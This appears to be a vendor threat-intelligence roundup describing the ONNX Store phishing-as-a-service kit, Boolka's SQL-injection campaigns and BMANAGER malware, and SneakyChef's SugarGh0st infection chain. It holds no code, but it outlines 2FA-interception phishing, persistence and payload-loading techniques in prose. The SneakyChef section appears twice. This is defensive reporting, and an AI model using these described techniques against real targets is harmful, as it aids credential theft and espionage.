CTI Roundup: Busy Days for Threat Actors ONNX Store, Boolka, & SneakyChef
ONNX Store targets the financial industry, Boolka delivers the BMANAGER trojan via SQLi attacks, and SneakyChef deploys SpiceRAT and SugarGh0st
In this week’s roundup, CTI looks at a phishing-as-a-service (PhaaS) platform called ONNX that is now targeting Microsoft 365 accounts in the financial industry. Next, CTI provides an update on a threat actor tracked as Boolka which compromises websites to deliver a trojan called BMANAGER. Finally, CTI wraps up with an overview of SneakyChef — a previously undocumented threat actor with ties to a cyberespionage campaign that targeted government entities.
1. ONNX Store targets the finance industry
A phishing-as-a-service (PhaaS) platform known as ONNX Store is targeting Microsoft 365 accounts. The attacks are currently targeting employees at financial firms and leverage QR codes within PDF attachments.
ONNX Store increases its chances of success by featuring a 2FA bypass mechanism that will intercept requests from its victims. EclecticIQ believes that the threat actor behind the ONNX Store PhaaS is the same as the actor behind the Caffeine kit and may be a rebranding of the platform. Back in 2023, the creator of the Caffeine kit announced that it would be rebranding and noted that it had moved to “ONNX STORE.” The rebrand has a focus on better OPSEC for actors, as Caffeine had relied on one single shared web server to manage all campaigns.
ONNX enables actors to control their campaigns via Telegram bots and has an additional support channel. EclecticIQ has observed bots for receiving 2FA codes, receiving Microsoft Office 365 credentials, for actors to control a webmail server to send phishing emails from, and for actors to make payments, track their orders, generate phishing emails and social engineering lures, and bulletproof hosting.
According to EclecticIQ, ONNX Store leverages Cloudflare to “delay the takedown process of phishing domains.”
ONNYX Store and QR phishing
Like many other phishing services today, ONNX Store now uses QR codes to execute attacks.
This phishing service will distribute PDF documents that contain a QR code. The PDFs often pretend to be about salary updates, employee handbooks, and other HR-related themes.
Scanning the QR code will direct the victim to a phishing site that is controlled by the threat actor. The page aims to steal login credentials and 2FA codes.
ONNX Store and JavaScript
ONNX Store uses encrypted JavaScript code that will decrypt itself when the page loads. This technique adds extra protection, particularly against anti-phishing scanners. The decrypted JavaScript is responsible for stealing the 2FA tokens that the victim enters.
Analyst comments from Tanium’s Cyber Threat Intelligence team
ONNX Store has many of the same features and capabilities as other phishing kits out there, so whether it will really take off is up for debate.
Right now, researchers have only observed the kit being used against financial firms. That could change given the creators’ increased focus on improving OPSEC for its users. Further, their use of QR codes demonstrates an interest in keeping up with the threat landscape.
2. Boolka deploys the BMANAGER trojan via SQLi attacks
A threat actor which is being tracked as Boolka is now compromising vulnerable websites to deliver a trojan called BMANAGER.
According to Group-IB, the actor has been conducting opportunistic SQL injection attacks across multiple countries since at least 2022, collecting and exfiltrating user inputs. The campaign redirects users to a landing page that prompts them to download and install a browser extension that is actually the BMANAGER trojan.
Web attacks involving Boolka
Boolka has been infecting websites with malicious JavaScript since 2022. When a user inevitably visits one of the infected sites, the script downloads and executes. The script will first send a request to Boolka’s server, letting them know that it was executed. It then moves on to collect user input into the site and exfiltrates the collected information.
An updated version of this script was recently discovered that has a few modifications. For example, it will now check for the existence of a specific div element with the ID “hookwork,” and will create one if it’s not present. The new version also contains additional checks to exclude specific properties from being sent to the server.
Malware delivery
A landing page which was discovered in January is now believed to be a test run of Boolka’s malware delivery platform. The platform is based on an open-source tool called BeEF. Boolka created three different domains for landing pages but has only observed using one of them.
In March 2024, Group-IB observed Boolka’s delivery platform in the wild for the first time. This platform is used to distribute the BMANAGER downloader.
Malware
Group-IB discovered multiple malware samples, all of which started with the BMANAGER dropper. Boolka was also observed using BMANAGER, BMANAGER downloader, BMREADER for data exfiltration, BMLOG for keylogging, BMHOOK for recording running applications with a keyboard focus, and BMBACKUP for file stealing.
BMANAGER downloader
The downloader tries to download and execute the BMANAGER malware. The malware is downloaded from a hard-coded URL in the dropper via an HTTP GET request. It achieves persistence via Windows tasks that will start the malware when a user logs in.
BMANAGER
The malware itself downloads files from a hard-coded C2. It will create startup tasks, delete startup tasks, and run various executables. When the malware first starts up it will register itself with the C2 using a randomly generated GUID that is stored in a SQL database. It will try to get a list from the C2 of applications that it should be targeting.
The malware will then obtain other executables from the C2. These include BMREADER, BMLOG, BMHOOK, and BMBACKUP. Most of the malware samples used a local SQL database that was hardcoded into the samples.
Analyst comments from Tanium’s Cyber Threat Intelligence team
Boolka has significantly evolved its tactics, techniques, and procedures (TTPs) since its first attack, pivoting from just SQL injection attacks that were opportunistic in nature to creating an entire malware delivery platform and custom malware.
This actor is proving to be a formidable threat, so it is surprising that we have not seen a ton of public reporting on its activities. On another note, the practice of using SQL injection attacks to steal sensitive data seems to be making a comeback.
3. SneakyChef deploys SpiceRAT and SugarGh0st
SneakyChef is now being linked to a cyberespionage campaign that targets government entities. The previously undocumented threat actor uses scanned documents of government agencies as lures and was observed using SugarGh0st and SpiceRAT malware in its campaigns.
About SneakyChef
Cisco Talos originally identified a campaign using the SugarGh0st RAT in mid-2023. Since then, they have continued to observe campaigns leveraging the same malware, leading them to create a new actor profile dubbed SneakyChef. This actor is believed to be Chinese speaking because of their language preferences and because they are using Gh0st RAT, which is popular with Chinese actors. This actor originally targeted Uzbekistan and South Korean users and has since broadened their target to include multiple countries across EMEA and Asia.
SneakyChef’s lures
SneakyChef is using lures involving scanned documents of government agencies. Cisco Talos notes that these documents do not appear to be publicly available.
For campaigns targeting Southern African countries, the documents impersonated the Ministry of Foreign affairs of Angola. For campaigns targeting Central Asian countries, the documents impersonated the Ministry of Foreign affairs of Turkmenistan or Kazakhstan.
Lures targeting Middle Eastern countries used documents that pretended to be about an official holiday. In addition to government-themed lures, Cisco Talos also observed a decoy document that was an application to register for a conference and a document that was a research paper abstract from another international conference. There were additional lures related to conference invitations and details.
Old and new C2 domains
As noted, Cisco Talos originally observed activity from this actor in 2023 even though it had not yet been attributed. The actor is continuing to use a C2 domain that was reported several months ago. They also observed a new C2 domain being used by the SugarGh0st malware between March and April 2024.
Infection chain: In the newest SneakyChef campaign the actor started using a third infection chain that abuses SFX RAR for initial access. When the victim of the attack runs the executable the SFX script will drop a decoy document, a DLL loader, the encrypted SugarGh0st payload, and a malicious VB script.
The VB script is executed first and will establish persistence via a registry key that will execute upon login. When the user logs in, a command is run to execute the loader DLL, update.dll. The loader is responsible for reading the encrypted SugarGh0st payload, authz.lib. It will decrypt it and inject it into a process.
SneakyChef, a previously undocumented threat actor, is now linked to a cyberespionage campaign that targeted government entities. The actor leverages scanned documents of government agencies as lures and is observed using SugarGh0st and SpiceRAT malware in its campaigns.
SneakyChef
Cisco Talos originally identified a campaign using the SugarGh0st RAT in mid-2023. Since then, they have continued to observe campaigns leveraging the same malware, leading them to create a new actor profile dubbed SneakyChef. This actor is believed to be Chinese speaking because of their language preferences and because they are using Gh0st RAT, which is popular with Chinese actors. This actor originally targeted Uzbekistan and South Korean users and has since broadened their targeting to multiple countries across EMEA and Asia.
Lures
SneakyChef is using lures involving scanned documents of government agencies. Cisco Talos notes that these documents do not appear to be publicly available. For campaigns targeting Southern African countries the documents used impersonated the Ministry of Foreign affairs of Angola. For campaigns targeting Central Asian countries, the documents instead impersonated the Ministry of Foreign affairs of Turkmenistan or Kazakhstan.
Lures targeting Middle Eastern countries instead used documents that pretended to be a circular about an official holiday. In addition to government themed lures, Cisco Talos also observed a decoy document that was an application to register for a conference and a document that was a research paper abstract from another international conference. There were additional lures related to conference invitations and details.
Old and new C2 domains
As noted, Cisco Talos originally observed activity from this actor in 2023 even though it had not yet been attributed. The actor is continuing to use a C2 domain that was reported on several months ago and this was observed up until mid-May 2024. They also observed a new C2 domain being used by the SugarGh0st malware between March and April 2024.
SneakyChef’s infection chain
In the newest SneakyChef campaign, the actor is using a third infection chain that abuses SFX RAR for initial access. When the victim of the attack runs the executable, the SFX script will drop a decoy document, a DLL loader, the encrypted SugarGh0st payload, and a malicious VB script.
The VB script executes first and will establish persistence via a registry key that will execute upon login. When the user logs in, a command runs to execute the loader DLL, update.dll. The loader is responsible for reading the encrypted SugarGh0st payload, authz.lib. It will decrypt it and inject it into a process.
Analyst comments from Tanium’s Cyber Threat Intelligence team
This reporting is an example of how difficult attribution can be. In this case, it wasn’t until nearly a full year later that researchers were able to tie a set of activities to an actor and to create a profile. This is particularly interesting for Chinese threat actors that tend to have such a strong overlap in TTPs that it can be difficult to distinguish them.
Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum and start a conversation.
For further reading, catch up on our recent cyber threat intelligence roundups.